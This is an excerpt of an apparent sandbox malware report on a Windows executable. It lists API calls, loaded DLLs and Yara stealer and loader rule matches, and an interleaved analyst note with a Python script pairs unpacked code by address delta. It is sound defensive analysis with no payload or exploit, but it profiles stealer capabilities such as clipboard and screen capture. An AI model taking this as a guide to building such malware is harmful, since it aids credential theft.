            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0042AFE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0042B190 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject

            System Summary

            Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004371C0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004381B0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004322C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,RtlAllocateHeap,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004372F0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00415300 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00438470 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004344DB NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00437550 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004376C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004166A7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004177E0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00415B15 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00419C00 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00423C16 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00433CF7 NtOpenSection
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00416C80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00434D0A NtMapViewOfSection
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00436E10 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00419E30 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041EFD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00436FF0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004180C5 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00413145 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00430450 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00437420 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00417670 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00432600 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004136F0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041B6AF NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004328F0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00421890 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004379E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00432A50 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041BA3C NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041DA90 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00432B60 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00418B31 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041DBF0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00432C90 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00437D70 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00432DA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00416E36 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00423FF3 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717077 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00713007 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F709D NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FA097 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717257 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0070425A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FF237 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F832C NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F33AC NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717427 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00718417 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F5567 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717557 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712527 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FA62C NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007186D7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007106B7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717687 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00714742 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007177B7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712867 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F78D7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F3957 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717927 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F690E NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FB916 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FA981 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F7A47 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00701AF7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712B57 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717C47 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FDCEB NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712CB7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FBCA3 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F5D7C NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FED2E NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712DC7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F8D98 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F9E67 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00703E7D NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FDE4E NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FEE57 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00712EF7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F6EF4 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717FD7 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00404AB0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0041EFD0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0042404C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004040E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004301F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004051B0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00403350
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0040A300
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00411410
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004064F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00403740
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00405700
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004379E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00406BF0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00420BFA
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00437D70
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00423F4D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00407FE0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00423FF3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007041B4
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E8247
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0070425A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006FF237
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007042B3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E4347
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00710457
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E5417
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006EA567
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E35B7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006F1677
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E6757
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E39A7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717C47
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E4D17
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00700E61
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00717FD7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: String function: 00409160 appears 162 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: String function: 00408A40 appears 41 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: String function: 006E8CA7 appears 42 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: String function: 006E93C7 appears 162 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Section loaded: ondemandconnroutehelper.dll
            Source: 20qMFnd9tO.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007E04C6 CreateToolhelp32Snapshot,Module32First
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_00427EC8 CoCreateInstance
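Two things in the function listings above deserve a check rather than a single read. First, the Yara hits: Windows_Trojan_RedLineStealer_ed346e4c and Windows_Trojan_Smokeloader_3687686f fired on memory regions of a sample the report otherwise identifies as LummaC (configuration extracted, C2 recovered). Family rules matching shared loader or packer code is common, so treat these two hits as corroboration that an unpacked stealer is resident in memory, not as evidence of a second family. Second, the NtAllocateVirtualMemory/NtFreeVirtualMemory pairs appear twice, once at 0x0041xxxx to 0x0043xxxx in the mapped image and once at 0x006Fxxxx to 0x0071xxxx, and the string-function lines report the same call count (162) at 0x00409160 and 0x006E93C7, a delta of 0x2E0267 that the 41/42-count pair (0x00408A40, 0x006E8CA7) shares. That is consistent with the 0x6E0000 region, the one the Smokeloader rule matched, holding the same code relocated after the unpacking the report flags; the plain function 0_2_00404AB0, for instance, reappears at 0_2_006E4D17, exactly that delta away. The delta is not page-aligned, which suggests raw bytes copied into a buffer rather than a freshly mapped image, though the listing alone cannot confirm that. The Toolhelp enumeration function 0_2_007E04C6 sits just past 0x7DF000, the start of the region where the RedLine rule matched. The script below is an added example, not part of the report: it parses such records, tags each function with a capability derived from its API sequence (a small map chosen for this example) and confirms the relocation pairing by address delta. The records are a constructed subset of the report's lines.

```python
"""Capability tags and relocation pairs from 'Code function' records.

Added example, not Joe Sandbox code. SAMPLE_RECORDS are constructed from a
subset of the report's 'Code function' entries; the capability map and the
relocation delta are this example's own heuristics, explained inline.
"""
import re
from collections import defaultdict

FUNC_RE = re.compile(
    r"Code function:\s*\d+_\d+_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<apis>[A-Za-z0-9_,]*)"
)
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")  # the trailing repeat of the id

# The report's string-function lines show the same call count (162) at
# 0x00409160 and 0x006E93C7; the difference is the offset from the mapped
# image to the unpacked copy in the 0x6E0000 region.
RELOCATION_DELTA = 0x006E93C7 - 0x00409160  # 0x2E0267

# A function gets a tag when it calls every API in the set (this example's map).
CAPABILITIES = {
    "clipboard-read": {"OpenClipboard", "GetClipboardData"},
    "screenshot": {"GetDC", "CreateCompatibleBitmap", "BitBlt"},
    "native-memory": {"NtAllocateVirtualMemory", "NtFreeVirtualMemory"},
    "section-map": {"NtMapViewOfSection"},
    "module-enum": {"CreateToolhelp32Snapshot", "Module32First"},
}

SRC = r"Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: "
SAMPLE_RECORDS = [
    SRC + "0_2_0042AFE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042AFE0",
    SRC + "0_2_0042B190 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,"
    "GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,"
    "SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,0_2_0042B190",
    SRC + "0_2_004371C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004371C0",
    SRC + "0_2_00415300 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00415300",
    SRC + "0_2_00433CF7 NtOpenSection,0_2_00433CF7",
    SRC + "0_2_00434D0A NtMapViewOfSection,0_2_00434D0A",
    SRC + "0_2_00717427 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717427",
    SRC + "0_2_006F5567 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F5567",
    SRC + "0_2_007E04C6 CreateToolhelp32Snapshot,Module32First,0_2_007E04C6",
    SRC + "0_2_00404AB0 0_2_00404AB0",  # plain function listing, no API calls
    SRC + "0_2_006E4D17 0_2_006E4D17",  # its relocated twin in the 0x6E0000 region
    "Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443",
]


def parse_record(line):
    """Return (address, [api, ...]) or None for records that are not functions."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a and not FUNC_ID_RE.match(a)]
    return int(m.group("addr"), 16), apis


def tag_capabilities(apis):
    """Sorted capability names whose API set is fully present in `apis`."""
    called = set(apis)
    return sorted(name for name, needed in CAPABILITIES.items() if needed <= called)


def summarize(lines):
    """address -> (apis, tags) for every function record in `lines`."""
    out = {}
    for line in lines:
        parsed = parse_record(line)
        if parsed is not None:
            addr, apis = parsed
            out[addr] = (apis, tag_capabilities(apis))
    return out


def capability_index(summary):
    """capability -> sorted hex addresses of the functions carrying it."""
    idx = defaultdict(list)
    for addr, (_, tags) in summary.items():
        for tag in tags:
            idx[tag].append(f"{addr:08X}")
    return {tag: sorted(addrs) for tag, addrs in idx.items()}


def relocated_pairs(summary, delta=RELOCATION_DELTA):
    """Functions in the mapped image whose copy at address+delta was recovered
    with the same API sequence: evidence that the high region is the same code
    after unpacking rather than a second payload."""
    pairs = []
    for addr, (apis, _) in sorted(summary.items()):
        twin = addr + delta
        if twin in summary and summary[twin][0] == apis:
            pairs.append((f"{addr:08X}", f"{twin:08X}"))
    return pairs


if __name__ == "__main__":
    s = summarize(SAMPLE_RECORDS)
    for tag, addrs in sorted(capability_index(s).items()):
        print(f"{tag:15} {', '.join(addrs)}")
    print("relocated:", relocated_pairs(s))
```

The relocation check is deliberately strict (identical API sequence at exactly address+delta); on the full listing some twins differ slightly because the disassembler resolved an extra call in one copy, as with 0_2_004322C0 and 0_2_00712527, so a production version would compare a similarity score rather than demand equality.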
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c3fa637-8c1d-4730-a530-86649b579ebd
            Source: 20qMFnd9tO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
